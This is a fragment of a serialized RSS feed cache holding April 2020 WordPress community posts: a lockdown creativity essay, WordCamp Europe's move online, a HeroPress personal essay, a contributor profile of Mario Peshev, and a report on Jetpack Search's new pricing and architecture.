Consume\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98400\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:201:\"https://wptavern.com/fighting-the-stay-at-home-boredom-time-to-create-rather-than-consume?utm_source=rss&utm_medium=rss&utm_campaign=fighting-the-stay-at-home-boredom-time-to-create-rather-than-consume\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7324:\"

A common theme among my friend groups is the utter boredom of being under stay-at-home orders during the COVID-19 pandemic. Part of me wants to tell folks that there has never been a greater time in human history to find something to do at home. There is a plethora of content available at the touch of a finger or even voice command.

\n\n\n\n

We have built a system, the web, that provides education, entertainment, and art at near-instantaneous speeds. Our WordPress community is a large part of that human endeavor.

\n\n\n\n

Perhaps the problem lies with our consumerist culture. With large social media networks effectively taking over the web, the trend seems to suggest that people spend their free time glued to their mobile devices, consuming content created by others. Now that many are home full time, it is easy to grow tired of consuming content that would normally be reserved for free time at all hours of the day.

\n\n\n\n

When asking what the elders in my family did in their free time decades ago, before modern technological advances, I noticed a different trend. They created music. On my grandmother’s side of the family, that musicality in our genes produced Hank Williams. On my grandfather’s side, we had The Tadlock Quartet, a little-known gospel group. If our family had a motto, it would be: if you don’t sing or play an instrument, you are not a Tadlock.

\n\n\n\n

I have an uncle who is a painter and magician. Some of my cousins are in a band. My sister creates vases, tabletops, and other pieces out of broken glass when she’s not chasing her two-year-old. My father is a singer, songwriter, and multi-instrument musician. I could go on listing the art that my family creates.

\n\n\n\n

Maybe I was fortunate to grow up in an artistic environment. That artistry has never been about fame and fortune. Most of my family will never reach stardom. However, we continue creating because it is simply a part of who we are.

\n\n\n\n

I also reminisce over my childhood years. I grew up in a lower-middle-class household. We did not have the luxury of the internet. We could not afford cable or satellite television. The only channels on the tube were 8, 12, 20, and sometimes 32. It was the era of the Saturday morning cartoon block, which I gladly awoke to every weekend with my off-brand cereal.

\n\n\n\n

Like many kids of my generation, I had a video game console and a handful of games. But, there are only so many times you can play through The Legend of Zelda: Ocarina of Time before finding something else to do.

\n\n\n\n

Most of my childhood was spent creating things. I ran several issues of a homemade video game magazine, painstakingly drawing all the artwork by hand. Fortunately, my uncle had a printer and scanner so that I could make copies. I wrote short stories, crafted screenplays, and filmed movies on a borrowed camcorder. I built tree forts that probably would not have passed any level of building safety codes, but my friends and I survived.

\n\n\n\n

I had about a three-year stint in the mid-’90s in which I fashioned myself a songwriter, following in my father’s footsteps (he has never sold a song but continues writing music to this day). I do not think I wrote anything other than love songs. What else would a 12-year-old boy write about? My only experience with love was a peck on the cheek from a previous girlfriend. Despite my naivete in matters of the heart, the human soul knows what it needs, and I expressed that through lyrics in the style of whatever boyband was popular in the given month. My music was not Grammy-worthy material, but it was deeply human.

\n\n\n\n

As I grew into adulthood, I did not stop creating. My journey into the world of WordPress began only because I wanted to share my writing. Eventually, I learned to create a new type of art: WordPress plugins and themes.

\n\n\n\n

Over my near-15 years of working with WordPress, my primary interest became more about building things that would help others to create. Even today, as a writer for the Tavern, my hope is to spark discussions and response articles that others create on their own blogs. This should never be a one-way discussion.

\n\n\n\n

Like many others, I recently found myself in a position with “nothing to do.” For the previous several months, I had been working on a plugin development book during my free time. Suddenly, I found myself with an empty calendar for an entire weekend. No social gatherings. No book chapters due. That meant putting my artist hat firmly back on my head. It was time to enjoy the act of creation for the sake of it, which led to a new plugin.

\n\n\n\n

It felt good to once again create something with no expectations. I was not getting paid to build this project. I wanted neither fame nor fortune. What I needed was a moment to express an idea.

\n\n\n\n

The act of creating art is a primal part of our nature. The plugin was my modern-day equivalent of sitting around the campfire and crafting a story of slaying a great beast that happened upon the village.

\n\n\n\n

I am a firm believer that every human has the capacity to create some form of artwork. A novel. A dance. A song. I have seen farmers with gardens so well-tended they would make you weep. I have watched a man with an intellectual disability hand-build intricate birdhouses. I have sat in astonishment, listening as a friend’s mother put together an entire piano arrangement after hearing a song only once.

\n\n\n\n

For the same reason, I am proud to be a part of the WordPress community. I am surrounded by artists in their own right daily. We create software that allows others to share their creations.

\n\n\n\n

When someone tells me they are bored during this social quarantine, I break out my speech about using this moment to create something. Anything. It does not need to have value to others. It should simply be an expression of one’s self. If they follow through, I give them a speech about building a site with WordPress to share what they have built.

\n\n\n\n

No, now is not the time for boredom. It should be a time of pure creation.

\n\n\n\n

Create a shop with WooCommerce for those handcrafted items you have been wanting to build for years. Build up your inventory right now so that it is ready to ship after the pandemic has passed. Write an e-book and sell it via Easy Digital Downloads. Start a local fundraising effort to help those in need in your neighborhood with the Give WP plugin. Create a new forum with bbPress on your favorite TV series or some other topic that piques your interest. Start a regular ol’ WordPress blog and share your thoughts during this time.

\n\n\n\n

Use this brief moment in history to create something new. Whether it is a side hustle, a new business, or poetry, just create. Then, of course, share it via your WordPress website.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 09 Apr 2020 20:11:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"WPTavern: WordCamp Europe 2020 Is Moving Online This Summer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98377\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:163:\"https://wptavern.com/wordcamp-europe-2020-is-moving-online-this-summer?utm_source=rss&utm_medium=rss&utm_campaign=wordcamp-europe-2020-is-moving-online-this-summer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3992:\"

On Monday, the WordCamp Europe team announced it would hold its annual event online from June 4-6. The move comes after initially postponing this year’s physical event because of the COVID-19 pandemic currently sweeping the globe. Like many other events, the organizing team is in the process of switching gears and moving everything to work over the internet.

\n\n\n\n

WordCamp Europe 2020 Online will hold a virtual contributor day on June 4. The last two days of the event will consist of live-streamed sessions and workshops for half days. The team is still working out the details and will keep everyone updated when possible.

\n\n\n\n

The reopening of the event to a virtual audience was met with enthusiasm when the team announced it on Twitter.

\n\n\n\n
\n

📣 We’re back! We are excited to announce WordCamp Europe 2020 Online – a virtual event taking place on 4-6 June 🎉 Add the dates back into your diaries and stay tuned for more details coming soon 📅 https://t.co/JdEEHN0GMT

— WordCamp Europe (@WCEurope) April 6, 2020
\n
\n\n\n\n

Last month, the organizers delivered the news that they would be postponing the 2020 physical event. “The decision to postpone WCEU 2020 was not made lightly, as each member of the organising team is deeply invested in the event, but it was made collectively,” wrote the team on the WordCamp EU blog. “[The community] is, by far, the most heartbreaking part of a cancellation: the fact that we won’t get to gather together in person, to connect, share knowledge and inspire one another during our sessions, hallway tracks, and dinners.”

\n\n\n\n

The organizers are rebooting the physical WordCamp EU event for 2021. Last month, the team confirmed June 3-5 for next year’s event. It will take place at the Super Bock Arena (Pavilhão Rosa Mota) in Porto, Portugal.

\n\n\n\n

For those who purchased tickets to the 2020 event, they should have already received a refund or get one by April 10. Organizers are in the process of contacting sponsors to discuss refunds and getting involved in the online event.

\n\n\n\n

The silver lining in this news is that everyone can attend WordCamp EU at no cost, albeit virtually rather than in person.

\n\n\n\n

Based on the size of the event, WordCamp EU will be the standard that many other events and meetups will likely want to emulate and build upon. It will be a test of how the WordPress community can come together and show the world that we can continue doing great things during uncertain times.

\n\n\n\n

Given that the current virus outbreak will likely continue through the summer, everyone in the WordPress community should mark this event on their calendars. Make social plans with the people who love the same software. It is free, and you are probably going to be home anyway. I look forward to an exciting event from the European WordPress community.

\n\n\n\n

To stay up to date on WordCamp EU or contact the team, follow its social networking accounts:

\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 08 Apr 2020 19:18:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"HeroPress: Embrace Who You Are and Others Will Follow\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=3095\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:158:\"https://heropress.com/essays/embrace-who-you-are-and-others-will-follow/#utm_source=rss&utm_medium=rss&utm_campaign=embrace-who-you-are-and-others-will-follow\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10634:\"\"Pull

Wondering how a university drop out with ADHD and a criminal record found a spot in the WordPress community? Read on to see why it’s often your “faults” that can make you a major asset to any product team.

\n

For as long as I can remember, I’ve had a knack for spotting an opportunity to make money. Even as an industrious seven-year-old, I knew that if I spent my birthday money on a value-size container of gumballs, I could sell them off to my classmates for a profit.

\n

Soon, every school recess and bus ride was a chance to make a sale and as I grew, so did my appetite for the hustle. Eventually, I replaced gumballs with mowing lawns and later, importing and reselling electronics. As long as there was a demand, nothing was off-limits.

\n

At this point, you may be expecting the rest of my story to go something like “serial entrepreneur switches to digital products, joins the WordPress community, and lives happily ever after,” right?

\n

Well, there are a lot more twists and turns before that since my hustling did end up getting me into a lot of trouble. My WordPress origin story includes a tale of how I escaped government spies in China, served a prison sentence in Kansas, and ultimately turned my mixed bag of (decidedly non-technical) business and people skills into a marketing position at Sandhills Development.

\nTyler Lau with Alain Schlesser at the Open Film premiere at WCUS 2019 in St.Louis.\n

Jack of all trades, master of fun

\n

One of the many reasons I’m always on the lookout for new projects and business opportunities is my Attention Deficit Hyperactivity Disorder (ADHD), a diagnosis I received nearly 14 years ago. As the only child of a divorced couple, all the attention was on me, but I couldn’t seem to keep my attention on anything.

\n

Luckily, the disorder that made me a restless child has made me a creative and adaptable adult. In my current role, I’m a marketing relationship builder at Sandhills Development, a plugin company with a portfolio of brands including AffiliateWP, Easy Digital Downloads, and Restrict Content Pro. Unlike most people at Sandhills who focus on one or two of our products, my role spans across all our digital properties.

\n

Not only am I representing a portfolio of products, but for each, my tasks involve post-sales communication, partnership, and affiliate development, B2B sales, and event marketing. Behind the scenes, I also organize our company retreats, book WordCamp travel arrangements, and even helped open two Sandhills breweries in Kansas. That’s right, we branched out of tech into beer!

\n

In a way, I’m the people person at Sandhills Development and the face of the company to many in the WordPress community. In an industry built by programmers and developers with outstanding focus and attention to detail, someone with ADHD wouldn’t seem like a natural fit. And yet, the WordPress community really is one of those places where everyone can find the right spot for their unique mix of skills. For me, my skill was people, and that has translated into a slew of responsibilities.

\nChatting with sponsors at WordCamp Seattle 2019\n

Relationship-building as a career

\n

On paper, there isn’t much that qualifies me to work for a tech company. Most of my previous experience was in the restaurant industry, something I’m still quite passionate about. That’s probably why I am always in charge of food at our company retreats. In fact, even though I was far from a Luddite, nothing on my CV pointed to a career in tech. And yet, that fast-paced, customer-facing service industry environment has actually prepared me the best for everything I’ve taken on since.

\n

When I’m at events on behalf of Sandhills, I’m meeting people from all over the world and developing personal and professional relationships with them, all while managing the logistics of event marketing. As an extrovert, I love it and I couldn’t imagine a job that didn’t involve relationship-building.

\n

Understanding people and being able to operate in any setting isn’t just an asset to grow a company, it can also be key to surviving in precarious environments. While my social tact is useful for making friends and building community in the WordPress space, at one point in my life, it was necessary for survival. Like the time I went to prison.

\n

The true meaning of freedom

\n

In the WordPress community, the concept of freedom comes up often. The GPL, free software, open-source communities…These are all fundamental values on which WordPress is built. Practically speaking, anyone can launch a company, become a freelancer, work remotely, or be their own boss to gain more freedom in their work and life. This is particularly appealing to me as someone who has never fit into the traditional work mold and as someone who now values my freedom more than ever.

\nWith attendees at WordCamp Ann Arbor 2019\n

Six years ago, my inner opportunist got me into trouble with the law selling marijuana. It was a quick way to make good money and after dropping out of college following a brain aneurysm, I needed capital to fund my first startup. Between my shifts as a waiter, I worked on prototypes for my first product. The company was growing fast and to protect my patents and take R&D to the next level, I had to work really hard.

\n

Everything came to a screeching halt when I went to prison. If you’re wondering if prison is like TV shows and movies, the answer is both yes and no. It’s harder in a lot of ways but my spirit never broke. Meeting other inmates reminded me that I was in a much better situation than most. I was educated, well-off, loved, and knew I had a future once I was released.

\n

Many inmates never graduated from high school and are completely computer illiterate. While on the inside, I taught science, math, writing, reading, and social studies. But still, I know many of them will struggle to get the mental health support and the job training they need to thrive after they serve their sentence. There’s more to freedom than just being on the outside. You also need a sense of agency and enfranchisement. As for me, my sense of purpose and my support network were plenty to keep me going and I was ready to take on my next (legal) business challenge as soon as I could.

\nWith sponsors and organizers at WCUS 2019 in St. Louis\n

Your past doesn’t define you but you can choose to embrace it

\n

I’m an outlier in many ways. From the day I was born, I was political. My father is a semi-dissident Chinese visual anthropologist and my mother is an art professor who left her home country of Japan to break from traditional Japanese gender roles. If you’re familiar with the history between these two nations, you’ll know a relationship between their citizens is rare and discouraged. I inherited a lot of that fearlessness, although I’m not sure if it’s nurture or nature. Most of my childhood was split, either following my father around the world, as he documented Chinese communities, or growing up as one of few Asian-Americans living in small-town Kansas.

\n

I’ve never fit in, and yet this is what makes me able to adapt to most situations and relate to just about anyone. I embrace my eclectic, dissonant past and see beauty in the person those experiences shaped me to be. Now, I’m able to put those skills to good use in the WordPress community and beyond. Regardless of your level of physical ability, your struggles with mental health, your upbringing, and even your run-ins with the law, no one is excluded from carving their place in the WordPress industry.

\n

The post Embrace Who You Are and Others Will Follow appeared first on HeroPress.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 08 Apr 2020 09:00:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Tyler Lau\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WordPress.org blog: People of WordPress: Mario Peshev\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8536\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2020/04/people-of-wordpress-mario-peshev/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10574:\"

You’ve probably heard that WordPress is open source software, and may know that it’s created and run by volunteers. Enthusiasts share many examples of how WordPress has changed people’s lives for the better. In this monthly series, we share some of those lesser-known, amazing stories.

\n\n\n\n

Computer science in the nineties

\n\n\n\n
\"\"Mario Peshev
\n\n\n\n

Mario has been hooked on computers ever since he got his first one in 1996. He started with digging into MS-DOS and Windows 3.1 first and learned tons by trial and error. Following that adventure, Mario built his first HTML site in 1999. He found development so exciting that he spent day and night learning QBasic and started working at the local PC game club. Mario got involved with several other things related to website administration (translating security bulletins, setting up simple sites, etc) and soon found the technology field was full of activities he really enjoyed.

\n\n\n\n

The Corporate Lifestyle

\n\n\n\n

Mario started studying programming including an intensive high-level course for C#, Java development, and software engineering, and eventually got a job in a corporate environment. He soon became a team lead there, managing all the planning and paperwork for their projects.

\n\n\n\n

But he continued freelancing on the side. He grew his own network of technical experts through attending, volunteering at, and organizing conferences. He also ran a technical forum and regularly spoke at universities and enterprise companies.

\n\n\n\n

Remote Working and Business Opportunity

\n\n\n\n

The combination of a high workload and a daily three-hour-long commute made Mario’s life difficult. Many of his friends were still studying, traveling or unemployed. The blissful and calm lives they lived seemed like a fairy tale to him. And even while both his managers and his clients were abroad, he was unable to obtain permission to work remotely. 

\n\n\n\n

So Mario decided to leave his job and start freelancing full time. But he found he faced a massive challenge. 

\n\n\n\n

He discovered Java projects were pretty large and required an established team of people working together in an office. All job opportunities were on-site, and some even required relocation abroad. Certified Java programmers weren’t being hired on a remote basis. 

\n\n\n\n

As Mario had some PHP experience from previous jobs, he used this to start his freelance career. For his projects, he used both plain PHP and PHP frameworks like CakePHP and CodeIgniter. 

\n\n\n\n

For a while, Mario accepted work using commonly known platforms including Joomla, Drupal, and WordPress. In addition, he worked on PHP, Java, Python and some C# projects for a couple of years, after which he decided to switch to WordPress completely.

\n\n\n\n

Building products

\n\n\n\n

One of his projects involved a technically challenging charity backed by several international organizations. Unexpected shortages in the team put him in the technical lead position. As a result, Mario found himself planning the next phases, meeting with the client regularly, and renegotiating the terms. The team completed the project successfully, and after the launch, a TV campaign led millions of visitors to the website.

\n\n\n\n

As a result of the successful launch, this client invited Mario to participate in more WordPress projects, including building a custom framework.

\n\n\n\n

“I wasn’t that acquainted with WordPress back then. For me, a conventional person trained in architectural design patterns and best practices, WordPress seemed like an eccentric young hipster somewhere on the line between insane and genius at the same time. I had to spend a couple of months learning WordPress from the inside out.”

Mario Peshev
\n\n\n\n

As his interest in WordPress grew, Mario stopped delivering other custom platforms, and converted clients to WordPress. 

\n\n\n\n

European Community

\n\n\n\n\"MarioMario presenting at a WordCamp\n\n\n\n

For Mario, one of the key selling points of WordPress was the international openness. He had previously been involved with other open source communities, some of which were US-focused. He felt they were more reliant on meeting people in person. With events only taking place in the US, this made building relationships much harder for people living in other countries.

\n\n\n\n

While the WordPress project started out in the US, the WordPress community quickly globalized. Dozens of WordCamps and hundreds of Meetup events take place around the globe every year.  All of these events bring a wide variety of people sharing their enthusiasm for WordPress together.

\n\n\n\n

For Mario, the birth of WordCamp Europe was something magical. The fact that hundreds, and later on thousands, of people from all over the world gathered around the topic of WordPress speaks for itself. Mario has been involved with organizing WordCamp Europe twice (in 2014 and 2015). 

\n\n\n\n

“There’s nothing like meeting WordPress enthusiasts and professionals from more than 50 countries brainstorming and working together at a WordCamp. You simply have to be there to understand how powerful it all is.”

Mario Peshev
\n\n\n\n

Growing businesses and teams

\n\n\n\n

A key WordPress benefit is its popularity – an ever growing project currently powering more than 35% of the Internet [2020]. It’s popular enough to be a de facto standard for websites, platforms, e-commerce and blogs. 

\n\n\n\n

WordPress has a low barrier to entry. You can achieve a lot without being an expert, meaning most people can start gaining experience without having to spend years learning how to code. That also makes it easier to build businesses and teams.

\n\n\n\n

“Being able to use a tool that is user-friendly, not overly complicated and easily extensible makes introducing it to team members faster and easier. It requires less time for adjustment, and as a result makes a team stronger and faster. The fact that this tool is cost-effective also allows more startups to enter the market. It requires  less time and investments to launch an MVP. This boosts the entire ecosystem.”

Mario Peshev
\n\n\n\n

Helping Others

\n\n\n\n

Mario also introduced WordPress to children and young people. He taught them how to use WordPress as a tool for homework and class assignments. By using WordPress, they were able to learn the basics of designing themes, developing plugins, marketing statistics, social media, copywriting, and so much more. This approachable introduction to the software meant technical skills were not needed.

\n\n\n\n

He was also part of a team of volunteers who helped a group of young people living at a foster home struggling to provide for themselves. The team taught the basic digital literacy skills necessary in the modern workplace and potentially pay for their rent and basic needs. This included working with Microsoft Word, Excel and WordPress, as well as some basic design and marketing skills. 

\n\n\n\n

“When you look at that from another perspective, a platform that could save lives – literally – and change the world for better is worth contributing to, in any possible manner.”

Mario Peshev
\n\n\n\n

Contributing to the WordPress community

\n\n\n\n

From the core team to supporting and organizing WordCamps, Mario has long been an active contributor to the global WordPress project. He is passionate about the connections fostered by people who are involved in building both the WordPress software and the community around it.

\n\n\n\n

“The WordPress community consists of people of all race and color, living all around the world, working as teachers, developers, bloggers, designers, business owners. Let’s work together to help each other. Let’s stick together and show  the world WordPress can help make it a better place.”

Mario Peshev
\n\n\n\n

Contributors

\n\n\n\n

Thanks to Alison Rothwell (@wpfiddlybits), Yvette Sonneveld (@yvettesonneveld), Abha Thakor (@webcommsat), Josepha Haden (@chanthaboune) and Topher DeRosia (@topher1kenobe). Thank you to Mario Peshev (@nofearinc) for sharing his #ContributorStory.

\n\n\n\n
\"HeroPress
\n\n\n\n

This post is based on an article originally published on HeroPress.com, a community initiative created by Topher DeRosia. HeroPress highlights people in the WordPress community who have overcome barriers and whose stories would otherwise go unheard.

\n\n\n\n

Meet more WordPress community members over at HeroPress.com!

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 08 Apr 2020 00:57:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Yvette Sonneveld\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Jetpack Re-launches Search Feature as Standalone Service\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98316\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:177:\"https://wptavern.com/jetpack-re-launches-search-feature-as-standalone-service?utm_source=rss&utm_medium=rss&utm_campaign=jetpack-re-launches-search-feature-as-standalone-service\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5477:\"

The Jetpack team announced today that its search service is now available as a separate package from the professional bundle it was previously under. The move should make it more affordable for small sites to use the service. Larger sites might have to shell out more money, depending on how much content is on the site.

\n\n\n\n

“Jetpack Search had only been available as a part of the Jetpack Professional plan at $29 per month, but that pricing felt unfair: a site with one million posts costs 1,000 times as much to index as a site with one thousand posts, but both sites were paying the same amount,” wrote Greg Brown, search wrangler at Automattic, in the announcement post. “New pricing makes Jetpack Search more affordable for small sites and still costs big sites less than the competition.”

\n\n\n\n

Jetpack Search now charges by the number of records:

\n\n\n\n\n\n\n\n

“Records” are posts, pages, and custom post types. However, that may change in the future. “We decided to use the term ‘records’ because we think there are use cases where we may want to index comments as their own records sometime in the future,” said Brown. “Similarly, there are use cases for indexing authors, tags, categories, etc. as their own records.”

\n\n\n\n

Jetpack Search combines comments and bbPress plugin replies, which are technically a custom post type, with their parent post. For now, these will not count against users’ record counts.

\n\n\n\n

One caveat with search is that media attachments are considered individual records by default. There are good reasons for some sites to expose attachments via search results. However, this could lead to unwanted records and cost more money each month for users who have a lot of media but do not wish to count those pages. Jetpack does have a filter hook that controls which post types are cached on the WordPress.com servers, so this can at least be configured via code.

\n\n\n\n

Version 8.4 of the Jetpack plugin also includes an updated search interface. When a site visitor enters a search query, a fullscreen modal appears to showcase the search results. The results are snappy because they rely on the WordPress.com API and updated technology underneath. The new interface should work well with most themes out of the box on both desktop and mobile views.

\n\n\n\nJetpack search results modal.\n\n\n\n

“This new version of Search is only available with the new plan,” said Brown. “The previous version of Search is still available on the Pro plan and will continue working as-is for the foreseeable future, but our focus going forward is on the new search experience.”

\n\n\n\n

New Architecture Behind Jetpack Search

\n\n\n\n

The new version of Jetpack Search runs on a re-architected technology layer. The old system was an Elasticsearch wrapper around the standard WordPress search feature. While it was quicker than normal WordPress search results, it was still slower than it needed to be. There was no built-in spelling correction. Searched terms were not highlighted.

\n\n\n\n

The new system uses the same sync technology behind Jetpack features like Related Posts, Publicize, and Stats to cache content. It then builds a search index using the Elasticsearch engine from the cache.

\n\n\n\n

The team has built an optimized API, which now supports searching as the user types and uses pageview stats as part of the algorithm in result rankings. Search input also goes directly from the browser to the API on WordPress.com, which minimizes the delay in returning results.

\n\n\n\n

“All search engines work by preprocessing the data to ensure that when a user’s search query comes in the results can quickly be returned,” said Brown. “For Jetpack Search, very little of the processing time on our servers goes to processing the queries. Almost all of the server load comes from indexing the data and reindexing it as the content changes. Across our main search cluster, for instance, only 10% of the CPU time is spent processing about 850 search queries per second. Most of the time is spent on the 650 index operations per second.”

\n\n\n\n

Brown explains this new architecture is why the new pricing tiers are based on the number of records cached from a site. “We preprocess the data, which expands how big it is; store it on the fastest SSDs we can buy; replicate it to multiple data centers; and then can quickly serve results as soon as a search request comes to our API.”

\n\n\n\n

For readers who are interested in a more technical breakdown of the system, Brown has written a full overview titled Real-Time Elasticsearch Indexing on WordPress.com on the Data for Breakfast blog.

